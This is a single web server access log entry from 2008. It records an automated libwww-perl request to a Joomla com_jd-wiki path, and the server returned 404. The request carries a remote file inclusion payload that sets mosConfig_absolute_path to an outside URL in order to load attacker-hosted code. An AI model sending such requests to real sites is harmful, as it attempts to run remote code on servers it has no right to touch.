89.108.67.131 - - [02/Jul/2008:21:28:14 -0500] "GET //components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://tarana.co.nz/gallely/includes/ons.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
